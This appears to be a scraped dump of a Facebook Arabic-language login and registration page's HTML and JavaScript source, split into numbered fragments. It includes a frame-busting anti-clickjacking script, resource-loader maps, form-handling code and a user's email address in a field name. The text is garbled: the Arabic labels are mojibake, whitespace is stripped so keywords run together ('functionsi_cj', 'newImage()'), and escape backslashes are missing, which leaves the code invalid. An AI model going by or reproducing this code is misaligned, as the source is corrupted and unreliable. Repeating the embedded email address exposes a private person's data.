 9. 9. وسياساتنا.">ÇáÔÑæØ</a> ·<a href="http://www.facebook.com/help/?ref=pf" accesskey="0"title="قم بزيارةمركزالمساعدة.">ÇáãÓÇÚÏÉ</a></div></div></div></div></div><script type="text/javascript">/*<![CDATA[*/functionsi_cj(m){setTimeout(function(){newImage().src="https://error.facebook.com/common/scribe_endpoint.php?c=si_clickjacking&t=3195"+"&m="+m;},5000);}if(top!=self && !false){try{if(parent!=top){throw 1;}varsi_cj_d=["apps.facebook.com","/pages/","apps.beta.facebook.com"];varhref=top.location.href.toLowerCase();for(var i=0;i<si_cj_d.length;i++){if(href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3https://www.facebook.com/index.php?stype=lo&lh=Ac8ZOFz7copa89em");}catch(e){si_cj("1 thttps://www.facebook.com/index.php?stype=lo&lh=Ac8ZOFz7copa89em");window.document.write("u003Cstyle>body *{display:none !important;}u003C/style>u003Ca href="#"onclick="top.location.href=window.location.href" style="display:block !important;padding:10px">u003Ci class="img sp_1fk18i sx_d48d46"style="display:block !important">u003C/i>u0627u0644u0630u0647u0627u0628 u0625u0644u0649Facebook.comu003C/a>");/*Ae-7VDYc*/}}/*]]>*/</script><script>Bootloader.setResourceMap({"9L2f7":{"type":"css","permanent":1,"crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yx/x/-8yo4WW-kUB.css"},"XeIi0":{"type":"css","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yY/x/EoP7MPYX4oc.css"},"SYR3Z":{"type":"css","permanent":1,"crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yx/x/1qhOMQtyJQg.css"},"VuNPD":{"type":"css","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yi/x/ONRYtHPFCvE.css"},"X/Fq6":{"type":"css","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yl/x/aBxxQe__Twl.css"},"sMH9Y":{"type":"css","permanent":1,"crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yB/x/AcvcVR5hH_c.css"},"VDymv":{"type":"css","permanent":1,"crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/y5/x/KpkEgBgqBbV.css"}});Bootloader.setResourceMap({"T8gbI":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yd/x/zwHY-EEE-Pj.js"},"PZesp":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yQ/x/Ko8Szv-oewB.js"},"MQ62x":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yI/x/Ybe54tOj6FQ.js"},"yK+9Y":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/y7/x/XqxVl40cGfn.js"},"cNca2":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yS/x/GYXBH3WLZ8A.js"},"XSxBT":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yB/x/OkwHUMPvzTf.js"},"YdG+M":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yq/x/HrY0j_7v9Se.js"},"RiBSU":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yv/x/W4l1oDGH10w.js"},"bf2Jx":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/y3/x/SamsZLLW0P3.js"},"oE4Do":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yQ/x/n__XSnUyMMq.js"},"raDxA":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yu/x/wY7a9kDGqFV.js"},"MqSmz":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yJ/x/YoZzpVWWXgr.js"},"JE+14":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yA/x/sZ9jei9urpY.js"},"ZQXFg":{"type":"js","crossOrigin":1,"src":"https://fbstatic-
 10. 10. a.akamaihd.net/rsrc.php/v2/yZ/x/6cc7yjos_ib.js"},"S2nrU":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yq/x/TjVTnu-tHXv.js"},"bwsMw":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yv/x/83LfdK7HZjH.js"},"FOq8J":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yD/x/Tz2uUwhoF1N.js"},"ARl1D":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/y1/x/1LuRgMrqS5x.js"},"zyFOp":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yx/x/-oyJV-uU4J0.js"},"rIX5p":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yl/x/WeQxHpphsQI.js"},"zx3Ke":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yn/x/o5pbR0WFEuQ.js"},"I9oIC":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yW/x/1EiV8IO2acC.js"},"2ma5f":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/y-/x/0LKs886_9xx.js"},"m1wJb":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yr/x/oRS6H06TshA.js"},"wxq+C":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yU/x/PXyNTYh4qvn.js"},"Rs18G":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yg/x/zFQig10mQ_m.js"},"H42Jh":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yV/x/d-N9fmoICW_.js"},"AtxWD":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yr/x/vbFhdqumDSu.js"},"SiRIA":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/yc/x/mbATRsAHF-f.js"}});Bootloader.enableBootload({"legacy:async-signal":{"resources":["PZesp"]},"AsyncDOM":{"resources":["PZesp","bf2Jx"],"module":true},"ConfirmationDialog":{"resources":["PZesp","MQ62x","oE4Do"],"module":true},"Dialog":{"resources":["PZesp","MQ62x","SYR3Z"],"module":true},"IframeShim":{"resources":["PZesp","MQ62x","raDxA","MqSmz"],"module":true},"editor":{"resources":["PZesp","MQ62x","JE+14"]},"registration":{"resources":["PZesp","MQ62x","raDxA","JE+14","XeIi0","T8gbI","ZQXFg"]},"ErrorSignal":{"resources":["PZesp","cNca2"],"module":true},"event-extensions":{"resources":["PZesp"],"module":true},"AsyncDialog":{"resources":["PZesp","MQ62x","raDxA","SYR3Z"],"module":true},"FbdDialogProvider":{"resources":["S2nrU","PZesp","bwsMw"],"module":true},"React":{"resources":["FOq8J"],"module":true},"AsyncRequest":{"resources":["PZesp"],"module":true},"PhotoSnowlift":{"resources":["PZesp","MQ62x","raDxA","SYR3Z","ARl1D"],"module":true},"SpotlightShareViewer":{"resources":["PZesp","MQ62x","X/Fq6","zyFOp"],"module":true},"PhotoTagger":{"resources":["PZesp","MQ62x","SYR3Z","rIX5p","ARl1D","raDxA","zx3Ke"],"module":true},"fb-photos-snowlift-css":{"resources":["sMH9Y","SYR3Z"]},"Live":{"resources":["PZesp","bf2Jx"],"module":true},"PhotoTagApproval":{"resources":["PZesp","ARl1D","zx3Ke"],"module":true},"PhotoTags":{"resources":["PZesp","ARl1D","SYR3Z","zx3Ke"],"module":true},"TagTokenizer":{"resources":["PZesp","MQ62x","ARl1D","I9oIC","zx3Ke","SYR3Z","raDxA"],"module":true},"fb-photos-snowlift-fullscreen-css":{"resources":["VDymv"]},"PhotoPivot":{"resources":["PZesp","MQ62x","ARl1D","raDxA","SYR3Z","2ma5f"],"module":true},"SnowliftPicCropper":{"resources":["PZesp","MQ62x","SYR3Z","ARl1D","raDxA","9L2f7","m1wJb","wxq+C"],"module":true},"PhotosButtonTooltips":{"resources":["PZesp","raDxA","MQ62x","SYR3Z","Rs18G"],"module":true},"VideoRotate":{"resources":["PZesp","H42Jh"],"module":true},"AsyncResponse":{"resources":["PZesp"],"module":true},"PhotoInlineEditor":{"resources":["PZesp","ARl1D","raDxA","MQ62x","SYR3Z","zx3Ke","AtxWD"],"module":true},"Form":
 11. 11. {"resources":["PZesp","MQ62x"],"module":true},"Toggler":{"resources":["PZesp","MQ62x","SYR3Z","raDxA"],"module":true},"Tooltip":{"resources":["PZesp","raDxA","MQ62x","SYR3Z"],"module":true},"DOM":{"resources":["PZesp"],"module":true},"Input":{"resources":["PZesp","MQ62x"],"module":true},"trackReferrer":{"resources":[],"module":true},"DimensionTracking":{"resources":["PZesp"],"module":true},"HighContrastMode":{"resources":["PZesp"],"module":true},"detect-broken-proxy-cache":{"resources":["PZesp"]},"link-rel-preload":{"resources":["PZesp"]},"legacy:dialog":{"resources":["PZesp","MQ62x","SYR3Z"]},"legacy:ajaxpipe":{"resources":["PZesp","MQ62x","SiRIA"]},"legacy:async":{"resources":["PZesp"]},"legacy:PhotoSnowlift":{"resources":["PZesp","MQ62x","raDxA","SYR3Z","ARl1D","Rs18G"]},"legacy:Toggler":{"resources":["PZesp","MQ62x","SYR3Z","raDxA"]}});</script><script>require("InitialJSLoader").loadOnDOMContentReady(["T8gbI","PZesp","MQ62x","yK+9Y","cNca2","XSxBT","YdG+M","RiBSU"]);</script><script>Bootloader.configurePage(["9L2f7","XeIi0","SYR3Z","VuNPD"]);Bootloader.done(["jDr+c"]);require("InitialJSLoader").handleServerJS({"elements":[["m_0_1","firstname",2],["m_0_2","lastname",2],["m_0_3","reg_email__",2],["m_0_4","reg_email_abdoahmd44@yahoo.com__",2],["m_0_5","reg_passwd__",2],["m_0_6","login_form",2],["m_0_7","loginbutton",2],["m_0_8","login_form",2],["m_0_0","reg",2]],"define":[["BanzaiConfig",[],{"MAX_SIZE":10000,"MAX_WAIT":60000,"COMPRESSION_THRESHOLD":800,"gks":{"cavalry":true,"jslogger":true,"miny_compression":true,"notifications":true,"time_spent":true,"time_spent_debug":true,"useraction":true}}]],"require":[["PixelRatio","startDetecting",[],[1]],["StickyPlaceholderInput","registerInput",["m_0_1"],[{"__m":"m_0_1"}]],["PlaceholderListener"],["PlaceholderOnsubmitFormListener"],["FlipDirectionOnKeypress"],["StickyPlaceholderInput","registerInput",["m_0_2"],[{"__m":"m_0_2"}]],["StickyPlaceholderInput","registerInput",["m_0_3"],[{"__m":"m_0_3"}]],["StickyPlaceholderInput","registerInput",["m_0_4"],[{"__m":"m_0_4"}]],["StickyPlaceholderInput","registerInput",["m_0_5"],[{"__m":"m_0_5"}]],["Intl","setPhonologicalRules",[],[{"meta":{"/_RTL/":"(([u0590-u05bf]|[u05c0-u07ff]))","/_Delim/":"(u0001u200f)","/_B/":"([.,!?s]|^)","/_E/":"([.,!?s]|$)"},"patterns":{"/u0629_Delim_RTL/":"u062au0001$2","/_RTL_Delim(s*)_RTL/":"$1u0001$4$5","/_u0001([^u0001]*)u0001/e":"mb_strtolower("u0001$1u0001")","/^x01([^x01])(?=[^x01]*x01)/e":"mb_strtoupper("u0001$1")","/_u0001([^u0001]*)u0001/":"javascript"}}]],["PostLoadJS","loadAndRequire",[],["DimensionTracking"]],["PostLoadJS","loadAndCall",[],["HighContrastMode","init",[{"currentState":"0","spacerImage":"https://fbstatic-a.akamaihd.net/rsrc.php/v2/y5/x/-PAXP-deijE.gif"}]]],["ClickRefLogger"],["userAction","setUATypeConfig",[],[{"ua:n":false,"ua:i":false,"ua:d":false,"ua:e":false}]],["ScriptPathState","setUserURISampleRate",[],[0.0002]],["userAction","setCustomSampleConfig",[],[{"uan":{"test":{"test":true}}}]],["UserActionHistory"],["TinyViewport"],["WebStorageMonster","schedule",[],[false]],["AsyncRequestNectarLogging"],["LoginFormController","init",["m_0_6","m_0_7"],[{"__m":"m_0_6"},{"__m":"m_0_7"}]]]});onloadRegister_DEPRECATED(function (){useragentcm();});onloadRegister_DEPRECATED(function (){ if (typeof RegUtil == undefined) { RegUtil = function() {}; } RegUtil.captcha_class="ReCaptchaCaptcha"; RegUtil.recaptcha_public_key="6LfDxsYSAAAAAGGLBGaRurawNnbvAGQw5UwRWYXL"; });
 12. 12. onloadRegister_DEPRECATED(function (){RegistrationBootloader.init("registration_container", true, "reg","form_focus", "https://www.facebook.com/ajax/register.php");});onloadRegister_DEPRECATED(function (){startFormTypeABTester($("reg"))});onloadRegister_DEPRECATED(function (){$("u_0_3").value =tz_calculate(1357151604)});onloadRegister_DEPRECATED(function (){try { $("email").focus(); } catch(_ignore) { }});onafterloadRegister_DEPRECATED(function (){Bootloader.loadComponents(["detect-broken-proxy-cache"], function(){ detect_broken_proxy_cache("0","c_user") });});onafterloadRegister_DEPRECATED(function (){Bootloader.loadComponents(["link-rel-preload"], function(){ link_rel_preload() });});</script><script>var bigPipe = new (require(BigPipe))({"lid":0,"forceFinish":true});</script><script>bigPipe.onPageletArrive({"is_last":true,"css":["9L2f7","XeIi0","SYR3Z","VuNPD"],"js":["T8gbI","PZesp","MQ62x","yK+9Y","cNca2","XSxBT","YdG+M","RiBSU"],"id":"first_response","phase":0})</script><script>bigPipe.onPageletArrive({"is_last":true,"css":["9L2f7","XeIi0","SYR3Z","VuNPD"],"js":["T8gbI","PZesp","MQ62x","yK+9Y","cNca2","XSxBT","YdG+M","RiBSU"],"id":"","phase":1,"the_end":true})</script></body></html>

×